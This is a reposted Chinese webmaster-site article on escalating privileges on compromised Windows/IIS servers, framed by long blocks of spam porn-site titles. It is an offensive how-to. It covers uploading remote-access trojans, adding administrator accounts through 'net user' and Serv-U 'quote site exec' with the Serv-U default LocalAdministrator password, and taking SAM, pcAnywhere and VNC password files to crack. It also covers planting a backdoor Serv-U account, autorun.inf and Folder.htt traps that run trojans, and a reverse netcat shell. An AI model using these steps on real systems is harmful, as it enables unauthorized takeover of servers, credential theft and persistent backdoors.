亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

主流與非主流提權技術大全

2022-9-24 10:25| 查看: 2352 |來源: 互聯網

一:檢測一下網站的服務器是否開了 3389 遠程終端 二:檢測一下服務是否用了serv-u (還有是什么版本的) 方法 一:復制一個網站 用 3389 登陸器連 ...

一:檢測一下網站的服務器是否開了 3389 遠程終端  
二:檢測一下服務是否用了serv-u (還有是什么版本的)
方法 一:復制一個網站 用 3389 登陸器連接一下 (是否成功)能連接了,拿下服務器的機率,提高 30%了
二:用ftp模式查下一個服務器的版本  
開始 -- 運行 -- cmd -- ftp (加你要登陸的網站)  
--------------------------------------------------------------------------------  
第一步:最簡單的方法
看有沒有權限,能不能執行命令,行的話直接傳個鴿子(隨便什么遠程控制木馬都行,成功率極低.  
--------------------------------------------------------------------------------  
第二步::尋找有執行的權限目錄
c:\\\\winnt\\\\system32\\\\inetsrv\\\\data\\\\    
c:\\\\Documents And Settings\\\\All Users\\\\
c:\\\\Program Files\\\\serv-u\\\\  
C:\\\\Program Files\\\\Microsoft SQL Server\\\\  
這樣的目錄可以直接上傳鴿子,運行
-----------------------------------------------------------------------------------  
第三步:傳個cmd和開帳號的ftp.exe上去直接加帳號,命令就是你上傳目錄D:\\\\VMware Workstation\\\\cmd.exe \\"net user love love /add\\"  
-----------------------------------------------------------------------------------    
第四步:asp提權木馬直接提權
serv-u 6.3 版本 好象用asp提權木馬(不成功)
serv-u 6.2 版本 好象可以  
不過提權能不能用asp木馬還要看服務器,設置的變態不,假設直接用asp提權成功之后,還是不成功,但是可以在 cmd之下 用這個帳號連接一下ftp (加你提權的網站)  
帳號:LocalAdministrator 密碼:$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號了
命令:quote site exec (你添加的帳號) net user 123 123 /ad
quote site exec (把帳號提升到最高權限) net localgroup administartors 123 /add  
---------------------------------------------------------------------------------------  
第五步:pcaanywhere
C:\\\\Documents And Settings\\\\All Users\\\\Application Data\\\\Symantec\\\\pcAnywhere\\\\  
這里下他的GIF文件,在本地安裝pcanywhere上去
---------------------------------------------------------------------------------------  
第六步:serv-u覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini  
網上很多教程
----------------------------------------------------------------------------------------  
第七步:Serv-U轉發端口
給Latte加鹽 曾經做個一個(serv-u經典提權全套教程)用到過這個方法,可以學習一下
上傳個端口轉發工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務器,IP填對方IP,帳號為LocalAdministrator 密碼為$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p  
連接上后你就可以管理他的Serv-u了
-----------------------------------------------------------------------------------------  
第八步:社會工程學之提升提權
把灰鴿子傳到上面,然后轉移到c盤,就等著管理員運行了,前提你的鴿子必須免殺讓我看到一個不清楚的exe程序,老想點開看看,呵呵(方法比較笨)
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸
C:\WINNT\system32\config進這里下它的SAM,破解用戶的密碼
c:\winnt\repaire 下是備份用到破解sam密碼的軟件有LC,SAMinside
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉,我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\  
C:\Documents and Settings\All Users\  
c:\winnt\system32\inetsrv\data\  
c:\Program Files\  
c:\Program Files\serv-u\  
C:\Program Files\Microsoft SQL Server\  
c:\Temp\  
c:\mysql\(如果服務器支持PHP)  
c:\PHP(如果服務器支持PHP)
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限
還可以用這段代碼試提升,好象不是很理想的,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁腳本 編寫一個啟動/關機腳本 重起
刪SAM :( 錯
CAcls命令  
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的權限提升21大法! 以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助! 1.radmin連接法
條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。 2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去 3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之 4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\  
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空  
[USER=WekweN|1]  
Password=  
HomeDir=c:\  
TimeOut=600  
Maintenance=System  
Access1=C:\|RWAMELCDP  
Access1=d:\|RWAMELCDP  
Access1=f:\|RWAMELCDP  
SKEYvalues=  
這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限 5.c:\winnt\system32\inetsrv\data\  
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然后執行 6.SU溢出提權
這個網上教程N多 不詳細講解了 7.運行Csript
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限  
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps  
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll  
再將asp.dll加入特權一族  
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)  
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"  
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"  
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"  
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了 8.腳本提權
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs 9.VNC
這個是小花的文章 HOHO  
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4破解它,vncx4使用很簡單,只要在命令行下輸入c:\>vncx4 -W 然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。 10.NC提權
給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了 11.社會工程學之GUEST提權
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號 手機號 盡量看看 HOHO 12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令 13.替換服務
這個不用說了吧?個人感覺相當復雜 14.autorun .inf
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信他不運行 15.desktop.ini與Folder.htt
引用:首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統文件")然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的后門 16.su覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

tag標簽:提權技術
本文最后更新于 2022-9-24 10:25,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        在线一区二区三区做爰视频网站| 91免费视频大全| 日本道免费精品一区二区三区| 欧美日本在线视频| 国产网红主播福利一区二区| 日本美女视频一区二区| 成人app网站| 欧美电视剧在线观看完整版| 一区二区三区在线免费| 国产91丝袜在线播放0| 88在线观看91蜜桃国自产| 国产精品伦理在线| 国内偷窥港台综合视频在线播放| 色妹子一区二区| 欧美国产视频在线| 久久国产剧场电影| 69av一区二区三区| 婷婷丁香久久五月婷婷| 91视频.com| 精品国偷自产国产一区| 青青草视频一区| 欧美三级电影网站| 亚洲成国产人片在线观看| 国v精品久久久网| 26uuu国产日韩综合| 日韩av网站在线观看| 972aa.com艺术欧美| 国产欧美日韩精品在线| 国产精品一二一区| 91精品国产手机| 亚洲综合丝袜美腿| 久久天堂av综合合色蜜桃网| 欧美私人免费视频| 韩国三级中文字幕hd久久精品| 日韩一区二区三区三四区视频在线观看| 玉米视频成人免费看| 欧美日韩你懂的| 成人av影视在线观看| 午夜精品在线视频一区| 欧美日韩国产综合草草| 偷窥国产亚洲免费视频| 国产伦精一区二区三区| 2019国产精品| 91成人在线精品| 国产真实乱偷精品视频免| 在线看一区二区| 欧美精品亚洲二区| 国产精品女人毛片| 日韩电影一二三区| 欧美在线|欧美| 欧美高清视频不卡网| 国产精品伊人色| 国产精品女上位| 国产一区二区中文字幕| 午夜精品视频一区| 国产欧美精品一区aⅴ影院| 国产欧美一区二区精品秋霞影院| 国产欧美综合在线| 国产精品污网站| 欧美色中文字幕| 国产一区二区网址| 亚洲一区免费观看| 国产精品青草久久| 欧美精品第1页| 欧美日韩成人一区| 欧美日韩的一区二区| 中文字幕一区二区三区在线播放| 国产成人三级在线观看| 国产女人水真多18毛片18精品视频 | 国产精品久久久久影院| 国产精品你懂的| 欧美日韩一级二级三级| 国产资源在线一区| 99re视频这里只有精品| 丁香婷婷综合网| 欧美极品美女视频| 欧美亚洲一区二区在线观看| 亚洲黄网站在线观看| 91精品国产综合久久福利| 最新热久久免费视频| 欧美国产精品中文字幕| 亚洲精品在线网站| 99久久免费视频.com| 在线看一区二区| 91国产丝袜在线播放| 精品少妇一区二区三区在线播放| 日韩欧美你懂的| 99久久综合国产精品| 日本一区二区三区dvd视频在线| 色综合久久88色综合天天6| 男女性色大片免费观看一区二区| 亚洲欧美综合网| 国产日韩欧美综合在线| 777色狠狠一区二区三区| 欧美不卡一区二区三区四区| 亚洲一二三区在线观看| 国产香蕉久久精品综合网| 综合欧美一区二区三区| 欧美aaa在线| 欧美日本国产一区| 国产欧美一区二区三区网站| 中文字幕免费不卡| 丁香婷婷深情五月亚洲| 一区二区三区精品视频在线| 欧美哺乳videos| 欧美羞羞免费网站| 视频一区视频二区中文字幕| 精品国产成人系列| www.日韩av| 国产精品乱人伦中文| av在线免费不卡| 国产成人精品影视| 精品乱人伦一区二区三区| 粗大黑人巨茎大战欧美成人| 亚洲成a人片综合在线| 亚洲乱码日产精品bd| 成人做爰69片免费看网站| 懂色av一区二区三区蜜臀| 日韩精品乱码av一区二区| 九色综合国产一区二区三区| 91精品免费观看| 亚洲欧洲www| 91美女在线看| 伊人夜夜躁av伊人久久| 色综合久久天天综合网| 亚洲色欲色欲www| 99视频一区二区| 亚洲裸体在线观看| 成人av午夜电影| 中文字幕亚洲成人| 欧美日韩国产综合久久| 亚洲国产sm捆绑调教视频 | 亚洲天堂中文字幕| 中文字幕国产精品一区二区| 欧美精品一区二区三区高清aⅴ | 成人h精品动漫一区二区三区| 三级久久三级久久久| 精品久久久久香蕉网| 成人手机在线视频| 日韩午夜小视频| 色狠狠桃花综合| 久久99在线观看| 久久久欧美精品sm网站| 久久99精品国产.久久久久久| 国产午夜精品福利| 亚洲高清免费视频| 色婷婷国产精品综合在线观看| 日韩一区二区不卡| 亚洲综合一区二区三区| 在线观看av一区| 日本伊人色综合网| 中文一区一区三区高中清不卡| 欧美网站大全在线观看| 国产传媒一区在线| 日韩精彩视频在线观看| 国产精品嫩草影院av蜜臀| aaa欧美色吧激情视频| 日韩**一区毛片| 中文一区在线播放| 欧美美女激情18p| 午夜伊人狠狠久久| 欧美午夜电影在线播放| 欧美网站一区二区| 日韩欧美中文一区二区| 久久综合九色综合97婷婷| 欧美一区二区三区免费观看视频| 91麻豆国产精品久久| 久久狠狠亚洲综合| 国产精品乱码一区二区三区软件| 欧美色窝79yyyycom| 色老头久久综合| 日韩欧美在线一区二区三区| 91久久精品一区二区三区| av在线不卡电影| 男人操女人的视频在线观看欧美| 日韩av在线播放中文字幕| 亚洲一二三区在线观看| 亚洲欧美日韩国产综合| 99久久久国产精品| 日韩写真欧美这视频| 精品国产乱码久久久久久牛牛| 久久久精品综合| 亚洲国产视频在线| 国产不卡在线一区| 成人免费电影视频| 捆绑调教一区二区三区| 亚洲图片自拍偷拍| 久草这里只有精品视频| 国产成人在线免费观看| 免费在线观看精品| 丁香激情综合五月| 国产精品一区二区久久精品爱涩| 国产欧美va欧美不卡在线| 91久久精品日日躁夜夜躁欧美| 91色在线porny| 91精品国产手机| 国产人成亚洲第一网站在线播放 | 色综合久久久久| 日韩精品一区二区三区蜜臀| 精品动漫一区二区三区在线观看|